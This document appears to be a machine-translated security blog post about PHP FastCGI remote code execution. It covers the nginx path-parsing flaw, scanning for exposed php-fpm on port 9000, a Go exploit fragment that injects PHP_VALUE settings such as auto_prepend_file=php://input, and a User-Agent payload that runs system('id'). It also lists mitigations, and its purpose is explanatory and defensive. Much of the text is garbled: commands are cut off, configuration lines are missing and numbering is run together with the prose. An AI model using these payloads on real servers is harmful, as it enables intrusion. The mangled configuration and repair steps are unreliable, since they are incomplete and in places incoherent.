PHP FastCGI RCE Vul

Catalog

1 . Introduction2. nginx file Type Error parsing vulnerability 3. fast-CGI attack for direct public network open 4. FCGI API dynamically modifies configuration in php.ini to implement RCE

1. Introduction

Let's start by combing the concept of CGI.

1. CGICGI is to ensure that the data passed by Web server is in standard format, which is essentially a protocol standard. Web server, such as Nginx, is simply the publisher of the content. Like1) If the request/index.html, then Web server will go to the file system to find this file, sent to the browser, where the static data is distributed2) If the request is/index.php, according to the configuration file, Nginx know that this is not a static file, need to find a PHP parser to deal with, then he will make this request simple processing to the PHP parser problem is the core of the nginx need to pass what data to the PHP parser, for example1) URL2) Query string3) Post Data4) HTTP Header: In essence, CGI is the protocol that specifies what data to pass to the rear to handle the request, and, as long as it is a program that follows this protocol standard, it can be called a CGI program .2. FastCGI first to be clear, fastcgi is also a protocol standard, FASTCGI is designed to improve the performance of CGI programs1First, fastcgi will start a master, parse the configuration file, initialize the execution environment2) and then start multiple worker3when the request comes in, master is passed to a worker, and immediately the next request can be accepted. This avoids repetitive labor and improves efficiency.4and when the worker is not enough, master can pre-boot several workers according to the configuration and so on, at the same time, if the idle worker is found too much, will also stop some, this improves performance, but also saves resources and corresponds to, as long as the protocol is followed by the standard implementation of the program, You can call it a fastcgi program .3. php-cgi/php-fastcgiphp's interpreter is PHP-cgi,php-CGI is only a CGI program, he himself can only parse the request, return the results, will not process management4.php-fpmphp-FPM is the manager of the php-cgi process, which manages the php-cgi process, and the PHP-FPM management object is php-cgi

0x1:php-fpm

The PHP-FPM features include

1. Supports smooth stop/Advanced Process Management features launched2. Can work in different Uid/gid/chroot environment, and listen to different ports and use different php.ini configuration files (can replace the settings of Safe_mode)3. StdOut, stderr log records4The ability to restart and cache corrupted opcode in the event of an unexpected situation5. File Upload optimization support6."Slow Log"-Record scripts (not only file names, but also PHP backtrace information that can be used by ptrace or similar tools to read and analyze the running data of remote processes), resulting in unusually slow operation7. Fastcgi_finish_request ()-Special features: To continue to perform time-consuming work in the background after the request finishes and refreshes the data (input video conversion, statistics processing, etc.)8. Dynamic/static child process generation9. Basic SAPI Run status information (Apache-like Mod_status)Ten. PHP.ini-based configuration files

Relevant Link:

http://php.net/manual/zh/install.fpm.configuration.phphttp://php.net/ manual/zh/install.fpm.phphttp://segmentfault.com/q/1010000000256516

2. nginx file type Error parsing vulnerability

0x1: Vulnerability Description

Vulnerability Description: Nginx is a high-performance Web server, the use of a very broad, not only often used as a reverse proxy, but also very good support for PHP operation. However, there is a serious security problem, which by default may cause server errors to parse any type of file in PHP, which will lead to serious security issues that could allow a malicious attacker to compromise an nginx server that supports PHP.

0x2: Vulnerability Analysis

Nginx supports PHP's operation by default in CGI mode, which is configured as follows in the configuration file.

Location ~ . php$ {    root html;     127.0. 0.1:9000;    Fastcgi_index index.php;     /Scripts$fastcgi_script_name;    Include Fastcgi_params;}

The configuration parameters are briefly described below

1 A URI environment variable    is used to select when a request is selected 1 The key variable passed to the backend fastcgi script_filename by Nginx-generated $fastcgi_script_name decision     2) and through analysis you can see the $ Fastcgi_script_name is directly controlled by the URI environment variable 2

Let's assume an attack scenario.

1. Suppose there is a url:http://localhost/test/test.jpg2. We have access to the following ways: http://localhost/test/test.jpg/test.php3. Nginx will get a URI:/test.jpg/test.php4. After the location instruction, the request will be given to the backend fastcgi processing, Nginx set the environment variable script_filename, the content is:/scripts/test.jpg/test.php5The fastcgi of the backend when this option is accepted, the Fix_pathinfo configuration determines whether additional processing is performed on the script_filename, typically if the fix_pathinfo is not set to affect the use of path_ Info is used for routing, so this option is generally configured to open. PHP through this option will find the real script file name, look for the way to see if the file exists, this time will be separated out script_filename and Path_info respectively1) Script_filename:/scripts/test.jpg2) PATH_INFO:test.php6. Finally, with/scripts/test.jpg as the script to be executed for this request, Nginx will use the PHP parser to process the JPG file, and the attacker can enable Nginx to parse any type of file in PHP.

The nature of the vulnerability is actually due to the fact that fcgi and webserver have different understandings of the script path-level parameters, which is typically caused by different interpretations of the same request due to different cross-system contexts, and its attack surface is an nginx with this vulnerability.

0x3:poc

Access to a Nginx support PHP site, in a file of any resource, such as robots.txt after adding/test.php, this arbitrary resource file will be executed as a PHP file

0x4: Repair scenario (requires reboot)

102. Add an if ($fastcgi _script_name ~) tothe Nginx configuration file . */.*php) {    return403;}

0X5: Repair solution (no restart required)

The premise is that the target server simultaneously exists FCGI API exposes the vulnerability of public network, using hotfix's repair idea, using the fcgi itself can be Rce's characteristics, using RCE to modify the vulnerability of the machine's fcgi vulnerability

1 configuration of Nginx configuration file for Target server modified with fcgi rce Vulnerability if ($fastcgi _script_name ~. */.*php) {    return403;} 2  0

Relevant Link:

http://www.80sec.com/nginx-securit.htmlhttp://php.net/manual/zh/ini.core.php

3. fast-cgi attack against direct public network opening

In addition to the use of Nginx file Parsing vulnerability, because fcgi and webserver communication through the network, so now more and more clusters will be fcgi directly tied to the public network, everyone can access it. This means that anyone can pretend to be webserver and let fcgi execute the script content we want to execute. We use PHP-FPM (PHP's fast-cgi implementation) as an example of the security risks associated with exposing fastcgi directly to the public network.

0x1: Affected range scan

/* 1. PHP-FPM The port that is listening by default is 90002. The reason for using SV is that because there may be other services on port 9000, we need to use Nmap fingerprint identification first to help us identify */9000  173. xxx.xxx. 1/

0X2:FCGI Hijacking POC

Because webserver in order to provide fastcgi some parameters, each time the request is forwarded, the Fastcgi_params package is passed to the fcgi process. Originally these parameters are the user is not controllable, but since this fcgi open to the outside, it also means that we can set these parameters, let us do something that could not be done

173. xxx.xxx. 183 9000 /etc//** *

Fcgi_exp.go

.. ENV:= Make (map[string]string) env["Script_filename"] =urlenv["Document_root"] ="/"env["Server_software"] ="go/fcgiclient"env["REMOTE_ADDR"] ="127.0.0.1"env["Server_protocol"] ="http/1.1"ifLen (reqparams)! =0{env["content_length"] =StrConv. Itoa (Len (reqparams)) env["Request_method"] ="POST"env["Php_value"] ="allow_url_include = on\ndisable_functions = \nsafe_mode = Off\nauto_prepend_file = Php://input"} Else{env["Request_method"] ="GET"}..

0x3: Attack vectors

1 similar to a common Lfi vulnerability, if you know the log path on this machine, or any file path that you can control the content, you can execute arbitrary code. //  http://www.cnblogs.com/LittleHann/p/3665062.html2. Dynamically modifies the value of Auto_prepend_file in php.ini to remotely execute arbitrary files. To turn a lfi loophole into an RFI.

0x4: Repair Solution

1 do not expose the fcgi interface to the public network. 2

4. Use FCGI API to dynamically modify configurations in php.ini to implement RCE

0x1: Attack vectors

Universal by setting fastcgi_params, we can use Php_admin_value and php_value to dynamically modify PHP settings

env["request_method""POST"  env["PHP _value""auto_prepend_file = php://input"  env["  php_admin_value""allow_url_include = on\ndisable_functions = \nsafe_ mode = Off"

Execute the Php://input, then write our PHP code in the Post's content, so that you can directly execute the

127.0. 0.1 9000 " ID; uname-a "    

0x2:poc

1"user-agent: <?system (' id ');d ie (); >" http://2. Remote contains execution code: Curl http:////-D parameter: The function is to define an INI value for PHP

0x2: Repair Solution

1 do not expose the fcgi interface to the public network (important) 2  3. Upgrading PHP CGI

Relevant Link:

http://zone.wooyun.org/content/1060http://zone.wooyun.org/content/151 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

Copyright (c) Littlehann All rights reserved

PHP FastCGI RCE Vul